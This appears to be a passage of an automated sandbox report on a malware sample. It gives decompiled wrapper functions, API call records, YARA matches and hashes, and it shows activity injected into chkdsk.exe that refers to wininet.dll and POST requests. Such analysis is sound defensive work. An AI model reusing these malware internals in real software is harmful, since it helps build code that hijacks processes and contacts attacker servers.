                                      • Opcode ID: 71c7088cf6bc23b96f580971d7f361d1decd71316cc3ed5d6009d06be1f2bd21
                                      • Instruction ID: c340780f08b8451111515dbcd8b1f231c7d4c204369fad4a53d0d12dcffe0823
                                      • Opcode Fuzzy Hash: 71c7088cf6bc23b96f580971d7f361d1decd71316cc3ed5d6009d06be1f2bd21
                                      • Instruction Fuzzy Hash: FFF0E2B22005046FEB14EF99CC45DE7736CEF98361F11858AF94C97240C231EC118AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				long _t9;
				void* _t10;
				void* _t12;
				long _t13;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t13 = _a16;
				_t9 = _a12;
				_t6 =  &_a8; // 0x414536
				_t12 =  *_t6;
				_t10 = RtlAllocateHeap(_t12, _t9, _t13); // executed
				return _t10;
			}








                                      0x0041a647
                                      0x0041a64c
                                      0x0041a64f
                                      0x0041a652
                                      0x0041a652
                                      0x0041a65d
                                      0x0041a661

                                      APIs
                                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 6EA
                                      • API String ID: 1279760036-1400015478
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408308, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E00408308(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				signed int _t15;
				long _t21;
				int _t26;
				void* _t29;
				void* _t31;
				void* _t36;

				_pop(_t20);
				_push(0xce74cef3);
				asm("adc [ebp-0x75], dl");
				_t29 = _t31;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t36, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t21 = _a8;
					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t38 = _t13;
					if(_t13 == 0) {
						_t15 = E0040A480(_t38, 1, 8) & 0x000000ff;
						_t13 =  *_t26(_t21, 0x8003, _t29 + _t15 - 0x40, _t13);
					}
				}
				return _t13;
			}













                                      0x00408308
                                      0x0040830a
                                      0x0040830f
                                      0x00408311
                                      0x0040831f
                                      0x00408323
                                      0x0040832e
                                      0x0040833e
                                      0x0040834e
                                      0x00408353
                                      0x0040835a
                                      0x0040835d
                                      0x0040836a
                                      0x0040836c
                                      0x0040836e
                                      0x0040837a
                                      0x0040838b
                                      0x0040838b
                                      0x0040838d
                                      0x00408392

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 6da4aff3f8700130538479ea939b3df12928e4deb9507837ad49f532943f4536
                                      • Instruction ID: eb1b710e1256d89ee1a10d32ec2b7c6c8a4d442da80d45c4cbe7d5cf8d833e99
                                      • Opcode Fuzzy Hash: 6da4aff3f8700130538479ea939b3df12928e4deb9507837ad49f532943f4536
                                      • Instruction Fuzzy Hash: 6801DD31A8032876E721A6559C43FFF6B2C5B40F54F04011DFF04BA1C1D6E8650547E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				signed int _t16;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t16 = E0040A480(_t33, 1, 8) & 0x000000ff;
					_t14 =  *_t26(_t22, 0x8003, _t27 + _t16 - 0x40, _t14);
					goto L4;
				}
				return _t13;
			}













                                      0x00408310
                                      0x0040831f
                                      0x00408323
                                      0x0040832e
                                      0x0040833e
                                      0x0040834e
                                      0x00408353
                                      0x0040835a
                                      0x0040835d
                                      0x0040836a
                                      0x0040836c
                                      0x0040836e
                                      0x0040838d
                                      0x00000000
                                      0x0040838d
                                      0x0040837a
                                      0x0040838b
                                      0x00000000
                                      0x0040838b
                                      0x00408392

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                      • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                      • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                      • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a67f
                                      0x0041a687
                                      0x0041a69d
                                      0x0041a6a1

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a7ea
                                      0x0041a800
                                      0x0041a804

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A7CB, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E0041A7CB(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t12;
				void* _t17;

				asm("rcr edi, 1");
				_t9 = _a4;
				E0041AF60(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t12;
			}





                                      0x0041a7cb
                                      0x0041a7d3
                                      0x0041a7ea
                                      0x0041a800
                                      0x0041a804

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 9c07bfc3489df66701806d444057332a5a75b14aba097594b7f413c433a1b6f4
                                      • Instruction ID: ccfebadbf5ca5a47bf41ca1d97d0bf9e33208da564f49b8907ec872c7d477311
                                      • Opcode Fuzzy Hash: 9c07bfc3489df66701806d444057332a5a75b14aba097594b7f413c433a1b6f4
                                      • Instruction Fuzzy Hash: 46E0DFB12042446FDB10DF65DC85EDB3FA8EF84310F148699FC885B202C934E515CBB5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                      0x0041a6b3
                                      0x0041a6ca
                                      0x0041a6d8

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Analysis Process: chkdsk.exe PID: 6420 Parent PID: 3424 chkdsk.exeCOMMON

                                      Executed Functions

                                      Function 04D7A360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04D74BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04D74BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04D7A3AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: f156d521ce954e1aa65f7c0b29923461c22e0251e78c5b216ef096aacb7a9e3e
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 31F0BDB2200208ABCB08CF88DC84EEB77ADEF8C754F158248FA0D97240D630F8118BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A35A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04D74BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04D74BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04D7A3AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 6390ce6fe18e55d88cde4709e75a68668ef7b31667bb57ee2501f5038f79fcef
                                      • Instruction ID: 845c7c2eb287f8ad0193274765676236795de16ff9ebb68a2e0b28309987cbdf
                                      • Opcode Fuzzy Hash: 6390ce6fe18e55d88cde4709e75a68668ef7b31667bb57ee2501f5038f79fcef
                                      • Instruction Fuzzy Hash: C9F0C4B2214149AFCB18CF98D884CEB7BADFF8C314B15864DFA0C97212D634E855CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A40A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D72,5EB65239,FFFFFFFF,04D74A31,?,?,04D74D72,?,04D74A31,FFFFFFFF,5EB65239,04D74D72,?,00000000), ref: 04D7A455
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001File.00000009.00000002.932154419.00000000050Read
                                      • String ID:
                                      • API String ID: 718190075-0
                                      • Opcode ID: a7d956f5fee2acbb4b54a922dcdb4dba2611aa15aac4643ed0cc73a3f7340144
                                      • Instruction ID: 1a184b922e4151f8492b2150352e7f4437e9d15bf4c67f393d36e76a3bbb7569
                                      • Opcode Fuzzy Hash: a7d956f5fee2acbb4b54a922dcdb4dba2611aa15aac4643ed0cc73a3f7340144
                                      • Instruction Fuzzy Hash: B7F0A4B2204118AFDB14DF89DC94EEB77ADEF8C754F168249FA1D97241D630E9118BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A410, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D72,5EB65239,FFFFFFFF,04D74A31,?,?,04D74D72,?,04D74A31,FFFFFFFF,5EB65239,04D74D72,?,00000000), ref: 04D7A455
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001File.00000009.00000002.932154419.00000000050Read
                                      • String ID:
                                      • API String ID: 718190075-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 5dfe14ba57cb1299ca002df5a53283ab4c0d2b662653d1b2f91ac1e65150223e
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 46F0A4B2200208ABDB14DF89DC80EEB77ADEF8C754F158249BA1D97241D630E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000004,00003000,00002000,00000000,?,04D62D11,00002000,00003000,00000004), ref: 04D7A579
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateC0000.00000040.00000001Memory.00000009.00000002.932154419.00000000050Virtual
                                      • String ID:
                                      • API String ID: 2792403363-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: 6345e0131c47c02dd8f15169552d080d7de40241c0b2ab01464528130fc5a434
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: 9FF015B2200208ABDB14DF89CC80EAB77ADEF88654F118149FE0897241C630F810CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A48A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D50,?,?,04D74D50,00000000,FFFFFFFF), ref: 04D7A4B5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Close.00000009.00000002.932154419.00000000050
                                      • String ID:
                                      • API String ID: 2580148879-0
                                      • Opcode ID: 4c55b76d9472388b35d5cdb612d7a17890d357038eaa6c73f301fa19f0645f09
                                      • Instruction ID: 11de9b9e70f7604c4ea86bb31e8b9ce9b61583ae3bdeef28598d70c90364afa0
                                      • Opcode Fuzzy Hash: 4c55b76d9472388b35d5cdb612d7a17890d357038eaa6c73f301fa19f0645f09
                                      • Instruction Fuzzy Hash: 7BE08671600214BFD710DB94CC44EDB7768EF44350F15406AF918A7341C530A5008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D50,?,?,04D74D50,00000000,FFFFFFFF), ref: 04D7A4B5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Close.00000009.00000002.932154419.00000000050
                                      • String ID:
                                      • API String ID: 2580148879-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: eb1942dc4466044f418a3eeaafd278adf9489b1cfc5c64c83da1da1600c63df7
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: 58D012752002146BD710EB98CC45E97775CEF44654F154455BA185B241D530F50086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D79077, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 100sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 04D79128
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: POST$net.dll$wininet.dll
                                      • API String ID: 3472027048-3140911592
                                      • Opcode ID: 5c013a545853956603970ec79eb163839675d0f1abc2e2a68e5451647e95c5b8
                                      • Instruction ID: 26ac9ae94f0a984fc86c588cc892ec1a62dc655d0f06afe1ef3ca728e18cee8d
                                      • Opcode Fuzzy Hash: 5c013a545853956603970ec79eb163839675d0f1abc2e2a68e5451647e95c5b8
                                      • Instruction Fuzzy Hash: 2B31E2B2604344AFE714DF64CC84FABB7B4FF44714F00819AEA295B241E774B560CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A662, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74536,?,04D74CAF,04D74CAF,?,04D74536,?,?,?,?,?,00000000,00000000,?), ref: 04D7A65D
                                      • RtlFreeHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04D63AF8), ref: 04D7A69D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Heap.00000009.00000002.932154419.00000000050$AllocateFree
                                      • String ID: .z`
                                      • API String ID: 47607806-1441809116
                                      • Opcode ID: 8bc93c323b02812d09e3c327acc3b06f11a6ccfc4b8439fd36e74d321482e4ec
                                      • Instruction ID: 2a236bed5172647a30154451f6bb22c0fc4e91230ea0d95f15cad2f616a7a3fb
                                      • Opcode Fuzzy Hash: 8bc93c323b02812d09e3c327acc3b06f11a6ccfc4b8439fd36e74d321482e4ec
                                      • Instruction Fuzzy Hash: 72F082B62405146FEB14EF98DC45DEB736DEF88751F118589F94C97350D231EC058AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D79080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 04D79128
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 05a80047e35f6ed8bde0abf918ac5eff3183537a554bf32b9d54d31f7916fd02
                                      • Instruction ID: 73ce7d89f10f34d0724ee61874ef635242669341f8a3fbdddfb7fe5db3681304
                                      • Opcode Fuzzy Hash: 05a80047e35f6ed8bde0abf918ac5eff3183537a554bf32b9d54d31f7916fd02
                                      • Instruction Fuzzy Hash: 5C3192B2600744BBD714DF64C889F67B7F8FB48B04F10815DFA2A6B244E630B560CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04D63AF8), ref: 04D7A69D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001FreeHeap.00000009.00000002.932154419.00000000050
                                      • String ID: .z`
                                      • API String ID: 735901401-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 1d257c3f1b88898d070d49e6e981dad34e6355c4184004d2a73dc4b9650468d3
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: DBE046B1200208ABDB18EF99CC48EAB77ACEF88754F118559FE085B341D630F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D68308, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04D6836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04D6838B
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: f20d2cea2a0cf7887ff6bbb550e22f1eae9ef2a86d6e1f65c8808a1a63db3ecc
                                      • Instruction ID: d13e033688f5036506ddc04b936036f5a59beca029eceb6866daa4023cba7a38
                                      • Opcode Fuzzy Hash: f20d2cea2a0cf7887ff6bbb550e22f1eae9ef2a86d6e1f65c8808a1a63db3ecc
                                      • Instruction Fuzzy Hash: 2501D471B812287BFB21A6949C42FFE7B2CAB41B55F040119FF04FA2C1E694750647F1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D68310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04D6836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04D6838B
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                      • Instruction ID: 8f2af7b9acd107878d613e83d1387c38cc9535ca94f65279aea90668755ea818
                                      • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                      • Instruction Fuzzy Hash: 4901F231B812287BFB20AA949C02FBE772CAB40F54F040119FF04BA2C0F6A4790642F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D68394, Relevance: 1.7, APIs: 1, Instructions: 161threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04D6838B
                                        • Part of subcall function 04D68310: PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04D6836A
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 37fb57d26e7098e0f78c75d28720d8ad1b158a391fc5ed203227cb564bcd527b
                                      • Instruction ID: 4d029ed0f9f10af94a3a149f04c439be03974b642170c82359e69ee3cc475b6d
                                      • Opcode Fuzzy Hash: 37fb57d26e7098e0f78c75d28720d8ad1b158a391fc5ed203227cb564bcd527b
                                      • Instruction Fuzzy Hash: FD51A4B1A013099FDB15EF64D885BEB77F8EB48308F10456DF94A97240EB70BA41CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D6ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000000,00000000,00000003,?), ref: 04D6AD62
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Dll.00000009.00000002.932154419.00000000050Load
                                      • String ID:
                                      • API String ID: 914370382-0
                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
